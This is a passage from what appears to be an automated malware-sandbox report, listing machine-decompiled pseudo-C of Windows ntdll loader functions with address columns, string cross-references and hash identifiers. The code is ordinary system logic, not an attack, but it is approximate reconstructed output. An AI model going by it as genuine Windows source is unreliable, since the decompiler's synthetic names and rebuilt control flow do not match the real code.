									} else {
										_t104 =  *0x1d8c5d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E1D7E5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x1d8c68d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E1D8188C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x1d8c68d8 = _v24;
											 *0x1d8c5d4c = _v28;
											goto L9;
										}
										_t89 =  *0x1d8c5d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E1D8188C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E1D8188C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8c68d8);
										goto L39;
									} else {
										_t101 =  *0x1d8c37c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D84E692();
											_t101 =  *0x1d8c37c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E1D7F0C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E1D7EDF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}











































                                                                            0x1d7f0af6
                                                                            0x1d7f0af8
                                                                            0x1d7f0afa
                                                                            0x1d7f0afd
                                                                            0x1d7f0b00
                                                                            0x1d7f0b06
                                                                            0x1d839ea5
                                                                            0x1d839ea5
                                                                            0x1d7f0b13
                                                                            0x1d7f0bd3
                                                                            0x1d7f0be3
                                                                            0x1d7f0be3
                                                                            0x1d7f0be5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7f0bd8
                                                                            0x1d7f0bdb
                                                                            0x1d7f0be0
                                                                            0x1d7f0be0
                                                                            0x00000000
                                                                            0x1d7f0b19
                                                                            0x1d7f0b19
                                                                            0x1d7f0b27
                                                                            0x1d7f0b2a
                                                                            0x1d7f0b36
                                                                            0x1d7f0c0d
                                                                            0x1d7f0c15
                                                                            0x1d7f0c20
                                                                            0x1d7f0c21
                                                                            0x1d7f0c23
                                                                            0x1d7f0c25
                                                                            0x1d7f0c25
                                                                            0x1d7f0b3e
                                                                            0x1d7f0b40
                                                                            0x1d7f0b43
                                                                            0x1d7f0b46
                                                                            0x1d7f0b4b
                                                                            0x1d7f0bc2
                                                                            0x1d7f0bc2
                                                                            0x1d7f0bc7
                                                                            0x1d7f0bd2
                                                                            0x1d7f0b4d
                                                                            0x1d7f0b50
                                                                            0x1d7f0b56
                                                                            0x1d7f0b59
                                                                            0x1d7f0b59
                                                                            0x1d7f0b5e
                                                                            0x1d839eb1
                                                                            0x1d839eb3
                                                                            0x1d839eb8
                                                                            0x1d839ebb
                                                                            0x1d839ebd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d839ec3
                                                                            0x1d7f0b66
                                                                            0x1d7f0b69
                                                                            0x1d7f0b70
                                                                            0x1d7f0bec
                                                                            0x1d7f0bf3
                                                                            0x1d7f0bfa
                                                                            0x1d7f0bfc
                                                                            0x1d7f0c02
                                                                            0x1d7f0c04
                                                                            0x1d7f0c04
                                                                            0x1d7f0bf3
                                                                            0x1d7f0b72
                                                                            0x1d7f0b76
                                                                            0x1d7f0b78
                                                                            0x1d7f0b7b
                                                                            0x1d7f0b7f
                                                                            0x1d7f0b80
                                                                            0x1d7f0b8a
                                                                            0x1d839ec8
                                                                            0x1d839ecb
                                                                            0x1d839ecb
                                                                            0x1d839ece
                                                                            0x1d839ece
                                                                            0x1d839ed1
                                                                            0x1d839ed4
                                                                            0x1d839ed4
                                                                            0x1d839edc
                                                                            0x1d839ede
                                                                            0x1d839ee5
                                                                            0x1d839ef1
                                                                            0x1d839ef1
                                                                            0x1d839ee7
                                                                            0x1d839ee7
                                                                            0x1d839eed
                                                                            0x1d839eed
                                                                            0x1d839ef4
                                                                            0x1d839f0a
                                                                            0x1d839f0c
                                                                            0x1d839f0f
                                                                            0x1d839f11
                                                                            0x1d839f4e
                                                                            0x1d839f54
                                                                            0x1d839f56
                                                                            0x1d839fbb
                                                                            0x1d839fbe
                                                                            0x1d839fc1
                                                                            0x1d839fc4
                                                                            0x1d839fc4
                                                                            0x1d839fc7
                                                                            0x1d839fca
                                                                            0x1d839fca
                                                                            0x1d839fd0
                                                                            0x1d839fd0
                                                                            0x1d839fd3
                                                                            0x1d839fdd
                                                                            0x1d839fe2
                                                                            0x1d839fe5
                                                                            0x1d839fe8
                                                                            0x1d839ff0
                                                                            0x00000000
                                                                            0x1d839ff0
                                                                            0x1d839f58
                                                                            0x1d839f5d
                                                                            0x1d839f5d
                                                                            0x1d839f62
                                                                            0x1d839f65
                                                                            0x1d839f6a
                                                                            0x1d839f6d
                                                                            0x1d839f70
                                                                            0x1d839f72
                                                                            0x1d839f75
                                                                            0x1d839f78
                                                                            0x1d839f78
                                                                            0x1d839f7b
                                                                            0x1d839f7e
                                                                            0x1d839f7e
                                                                            0x1d839f93
                                                                            0x1d839f9a
                                                                            0x1d839f9f
                                                                            0x1d839fb4
                                                                            0x00000000
                                                                            0x1d839f13
                                                                            0x1d839f13
                                                                            0x1d839f18
                                                                            0x1d839f1a
                                                                            0x1d839f1c
                                                                            0x1d839f21
                                                                            0x1d839f23
                                                                            0x1d839f24
                                                                            0x1d839f29
                                                                            0x1d839f2e
                                                                            0x1d839f33
                                                                            0x1d839f38
                                                                            0x1d839f3d
                                                                            0x1d839f3d
                                                                            0x1d839f40
                                                                            0x1d839f42
                                                                            0x1d839f48
                                                                            0x1d839f48
                                                                            0x00000000
                                                                            0x1d839f42
                                                                            0x1d839f11
                                                                            0x1d7f0b8a
                                                                            0x1d7f0b90
                                                                            0x1d7f0b96
                                                                            0x1d7f0ba1
                                                                            0x1d7f0baa
                                                                            0x1d7f0bb2
                                                                            0x1d7f0bb5
                                                                            0x1d7f0bb8
                                                                            0x1d7f0bbb
                                                                            0x1d7f0bbf
                                                                            0x00000000
                                                                            0x1d7f0bbf
                                                                            0x1d7f0b4b

                                                                            APIs
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D839F2E
                                                                            • LdrpCheckModule, xrefs: 1D839F24
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 1D839F1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-161242083
                                                                            • Opcode ID: de5632758b34d1952b8144c04a4604dcd8c1196f740e94d9906d2c1c1d5b889b
                                                                            • Instruction ID: b4a187b8535144e3619b23e453847b5d26d38526ccb84193bc85989b4829f0ca
                                                                            • Opcode Fuzzy Hash: de5632758b34d1952b8144c04a4604dcd8c1196f740e94d9906d2c1c1d5b889b
                                                                            • Instruction Fuzzy Hash: 6871F074A00255DFCB15DF68CC85BFEB7F0FB48618F15806AE919A7360E334AA41CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7F9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 66%
                                                                            			E1D7F9723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E1D7FA4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x1d8c65f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x1d8c9214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E1D7DFED0(0x1d8c32d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x777236a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E1D7F0C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x1d8c91e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E1D7D98DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E1D8585AA(_t87);
							}
						}
						__eflags =  *0x1d8c37c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E1D7FA390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x1d8c32d8);
					_t50 = E1D7DE740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L1D7E2330(_t50, 0x1d8c6668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E1D7ED963(_t86, _t86, 0, _t104, _t110, __eflags);
								E1D7E24D0(0x1d8c6668);
								__eflags = _v12;
								if(_v12 != 0) {
									E1D7F9723(_t86, 0);
								}
								_t50 = E1D7E3BC0( *0x1d8c5d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E1D7F9938(L1D7E2330(_t50, 0x1d8c6668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L1D7F9B40(_t85, _t107, _t110, 0x1d8c67ac);
							_t29 = _t107 + 0x68; // -68
							L1D7F9B40(_t85, _t107, _t110, 0x1d8c67a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E1D7E24D0(0x1d8c6668);
						if( *0x1d8c5d70 != 0) {
							E1D80680F(_t107);
						}
						_t50 = E1D7ED3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}








































                                                                            0x1d7f9723
                                                                            0x1d7f972b
                                                                            0x1d7f9736
                                                                            0x1d7f9738
                                                                            0x1d7f973c
                                                                            0x1d7f973e
                                                                            0x1d7f9742
                                                                            0x1d7f9747
                                                                            0x1d7f97bc
                                                                            0x1d7f97bc
                                                                            0x1d7f97bc
                                                                            0x1d7f97bc
                                                                            0x1d7f97c0
                                                                            0x1d7f97c5
                                                                            0x1d7f97c5
                                                                            0x1d7f97cb
                                                                            0x1d7f9900
                                                                            0x1d7f9908
                                                                            0x1d7f9913
                                                                            0x1d7f9914
                                                                            0x1d7f9916
                                                                            0x1d7f9918
                                                                            0x1d7f9918
                                                                            0x1d7f97d6
                                                                            0x1d7f97db
                                                                            0x1d7f97dd
                                                                            0x1d7f97dd
                                                                            0x1d7f97e1
                                                                            0x1d7f97e3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7f97e5
                                                                            0x1d7f97e5
                                                                            0x1d7f97e8
                                                                            0x1d7f97ec
                                                                            0x1d7f97ee
                                                                            0x1d7f97f1
                                                                            0x1d7f97f4
                                                                            0x1d7f97f9
                                                                            0x1d7f97fb
                                                                            0x1d7f9922
                                                                            0x1d7f9928
                                                                            0x1d7f9928
                                                                            0x1d7f9803
                                                                            0x1d7f9805
                                                                            0x1d7f980a
                                                                            0x1d7f980e
                                                                            0x1d7f9815
                                                                            0x1d83dade
                                                                            0x1d83dae0
                                                                            0x1d83dae0
                                                                            0x1d7f9815
                                                                            0x1d7f981b
                                                                            0x1d7f9822
                                                                            0x1d83daea
                                                                            0x1d83db04
                                                                            0x1d83db09
                                                                            0x1d83db09
                                                                            0x1d7f9828
                                                                            0x1d7f982a
                                                                            0x1d7f982d
                                                                            0x1d7f9836
                                                                            0x1d7f9836
                                                                            0x1d7f983a
                                                                            0x1d7f983f
                                                                            0x1d7f9755
                                                                            0x1d7f9755
                                                                            0x1d7f9755
                                                                            0x1d7f975a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7f986e
                                                                            0x1d7f9870
                                                                            0x1d7f9872
                                                                            0x1d7f992f
                                                                            0x1d7f9931
                                                                            0x1d7f9878
                                                                            0x1d7f9878
                                                                            0x1d7f9878
                                                                            0x1d7f9878
                                                                            0x1d7f9878
                                                                            0x1d7f987c
                                                                            0x1d7f987e
                                                                            0x00000000
                                                                            0x1d7f9884
                                                                            0x1d7f9889
                                                                            0x1d7f988e
                                                                            0x1d7f9891
                                                                            0x1d7f9891
                                                                            0x1d7f9894
                                                                            0x1d7f9897
                                                                            0x1d7f9899
                                                                            0x1d7f989d
                                                                            0x1d7f989f
                                                                            0x1d7f98b1
                                                                            0x1d7f98b3
                                                                            0x1d7f98b5
                                                                            0x1d7f98b8
                                                                            0x1d7f98c0
                                                                            0x1d7f98c2
                                                                            0x1d7f98c2
                                                                            0x1d7f98c4
                                                                            0x1d7f98c4
                                                                            0x1d7f98cd
                                                                            0x1d7f98d0
                                                                            0x1d7f98da
                                                                            0x1d7f98df
                                                                            0x1d7f98e4
                                                                            0x1d7f98e8
                                                                            0x1d7f98e8
                                                                            0x1d7f98f6
                                                                            0x00000000
                                                                            0x1d7f98f6
                                                                            0x1d7f98a1
                                                                            0x1d7f98a3
                                                                            0x1d7f98a3
                                                                            0x1d7f98a5
                                                                            0x1d7f98a7
                                                                            0x1d7f98a9
                                                                            0x1d7f98a9
                                                                            0x1d7f98ad
                                                                            0x00000000
                                                                            0x1d7f98ad
                                                                            0x1d7f987e
                                                                            0x1d7f9760
                                                                            0x1d7f9762
                                                                            0x1d7f976b
                                                                            0x1d7f97b5
                                                                            0x1d7f97bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7f976d
                                                                            0x1d7f976d
                                                                            0x1d7f976d
                                                                            0x1d7f976f
                                                                            0x1d7f9777
                                                                            0x1d7f9782
                                                                            0x1d7f978b
                                                                            0x1d7f9849
                                                                            0x1d7f9852
                                                                            0x1d7f9857
                                                                            0x1d7f9860
                                                                            0x1d7f9865
                                                                            0x1d7f9865
                                                                            0x1d7f9796
                                                                            0x1d7f97a2
                                                                            0x1d83db13
                                                                            0x1d83db13
                                                                            0x1d7f97aa
                                                                            0x1d7f97af
                                                                            0x1d7f97b1
                                                                            0x00000000
                                                                            0x1d7f976d
                                                                            0x1d7f974d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7f9753
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-2283098728
                                                                            • Opcode ID: 20e8a6dddca2474309d6db33fb79787666769ea76724ac88bf84bcb6d4736f00
                                                                            • Instruction ID: 07667a7daaa585ff4c737a0d98cfecfeb731155f081f056e1464e15ea825de39
                                                                            • Opcode Fuzzy Hash: 20e8a6dddca2474309d6db33fb79787666769ea76724ac88bf84bcb6d4736f00
                                                                            • Instruction Fuzzy Hash: EA51E235608742DFC721DF38D884B6D77A1BB88634F154A2EE5A6873A1D770E844CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D80C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 54%
                                                                            			E1D80C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E1D7F0130();
				if(_t25 != 0) {
					L1D7E2330(_t25, 0x1d8c5b5c);
					_t27 =  *0x1d8c9224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E1D7C9050( *0x1d8c921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E1D7E24D0(0x1d8c5b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x1d8cb370 ^ _t87;
							_t76 = _t65;
							 *0x1d8c91e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x1d8c660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E1D85CB20(0x1d8c5b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x1d8c6608 & 0x0000ffff) + 2 + _t67;
									_t42 = E1D7E5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E1D7F10D0(_t67,  &_v572, 0x1d8c6608);
										E1D7F10D0(_t67,  &_v580,  &_v572);
										E1D7DFE40(_t67,  &_v588, ";");
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8c660c);
										 *0x1d8c6608 = _v608;
										_t54 = _v604;
										 *0x1d8c660c = _t54;
										 *0x1d8c6604 = _t54;
										E1D85D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x1d8c37c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D84E692();
											_t56 =  *0x1d8c37c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E1D814B50(_t39, 0x1d8c5b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x1d8c9224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E1D7C9050( *0x1d8c921c, 1);
								}
							}
							_t25 = E1D7E24D0(0x1d8c5b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}




































                                                                            0x1d80c640
                                                                            0x1d80c642
                                                                            0x1d80c644
                                                                            0x1d80c645
                                                                            0x1d80c647
                                                                            0x1d80c64e
                                                                            0x1d80c65a
                                                                            0x1d80c65f
                                                                            0x1d80c664
                                                                            0x1d80c666
                                                                            0x1d80c668
                                                                            0x1d80c6a4
                                                                            0x1d80c6a6
                                                                            0x00000000
                                                                            0x1d80c6a8
                                                                            0x1d80c6a8
                                                                            0x00000000
                                                                            0x1d80c6a8
                                                                            0x1d80c66a
                                                                            0x1d80c66a
                                                                            0x1d80c66c
                                                                            0x1d80c675
                                                                            0x1d80c675
                                                                            0x1d80c67a
                                                                            0x1d80c67d
                                                                            0x1d80c6ab
                                                                            0x1d80c6ac
                                                                            0x1d80c6b3
                                                                            0x1d80c6b4
                                                                            0x1d80c6be
                                                                            0x1d80c6cb
                                                                            0x1d80c6dc
                                                                            0x1d80c6df
                                                                            0x1d80c6e9
                                                                            0x1d80c6e9
                                                                            0x1d80c6eb
                                                                            0x1d848090
                                                                            0x1d84809b
                                                                            0x1d8480a4
                                                                            0x1d8480a9
                                                                            0x1d8480ae
                                                                            0x1d84817f
                                                                            0x1d848183
                                                                            0x1d848188
                                                                            0x1d848189
                                                                            0x00000000
                                                                            0x1d8480b4
                                                                            0x1d8480c4
                                                                            0x1d8480cc
                                                                            0x1d8480d1
                                                                            0x1d8480d5
                                                                            0x1d8480d7
                                                                            0x1d848114
                                                                            0x1d848116
                                                                            0x1d84811b
                                                                            0x1d84812a
                                                                            0x1d848139
                                                                            0x1d848148
                                                                            0x1d84815e
                                                                            0x1d848167
                                                                            0x1d84816c
                                                                            0x1d848170
                                                                            0x1d848175
                                                                            0x1d84817a
                                                                            0x00000000
                                                                            0x1d8480d9
                                                                            0x1d8480d9
                                                                            0x1d8480de
                                                                            0x1d8480e0
                                                                            0x1d8480e2
                                                                            0x1d8480e7
                                                                            0x1d8480e9
                                                                            0x1d8480ee
                                                                            0x1d8480f3
                                                                            0x1d8480f8
                                                                            0x1d8480fd
                                                                            0x1d848102
                                                                            0x1d848102
                                                                            0x1d848105
                                                                            0x1d848107
                                                                            0x1d848109
                                                                            0x1d848109
                                                                            0x1d84810a
                                                                            0x1d84810a
                                                                            0x1d8480d7
                                                                            0x1d80c6f1
                                                                            0x1d80c6f1
                                                                            0x1d80c6f1
                                                                            0x1d80c6f1
                                                                            0x1d80c6f1
                                                                            0x1d80c6fa
                                                                            0x1d80c6fb
                                                                            0x1d80c705
                                                                            0x1d80c67f
                                                                            0x1d80c67f
                                                                            0x1d80c67f
                                                                            0x1d80c680
                                                                            0x1d80c680
                                                                            0x1d80c685
                                                                            0x1d80c687
                                                                            0x1d80c689
                                                                            0x1d80c68b
                                                                            0x1d80c68d
                                                                            0x1d80c697
                                                                            0x1d80c697
                                                                            0x1d80c68d
                                                                            0x1d80c69d
                                                                            0x00000000
                                                                            0x1d80c69d
                                                                            0x1d80c67d
                                                                            0x1d80c650
                                                                            0x1d80c650
                                                                            0x1d80c653
                                                                            0x1d80c653

                                                                            APIs
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D8480F3
                                                                            • Failed to reallocate the system dirs string !, xrefs: 1D8480E2
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 1D8480E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1783798831
                                                                            • Opcode ID: 663683233297036e988a280e6e855f567f6d771b7fd8edfbc55491456c42d63c
                                                                            • Instruction ID: 3c961ecdc5159a04134588b052bc0ef1591645fd9e0b856b7a48e9c78192fc9a
                                                                            • Opcode Fuzzy Hash: 663683233297036e988a280e6e855f567f6d771b7fd8edfbc55491456c42d63c
                                                                            • Instruction Fuzzy Hash: AC41D375518315EBC721DF24EC85B9B77F8EF486A4F01492AF96897260EB34E800CB97
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D8543D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 50%
                                                                            			E1D8543D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
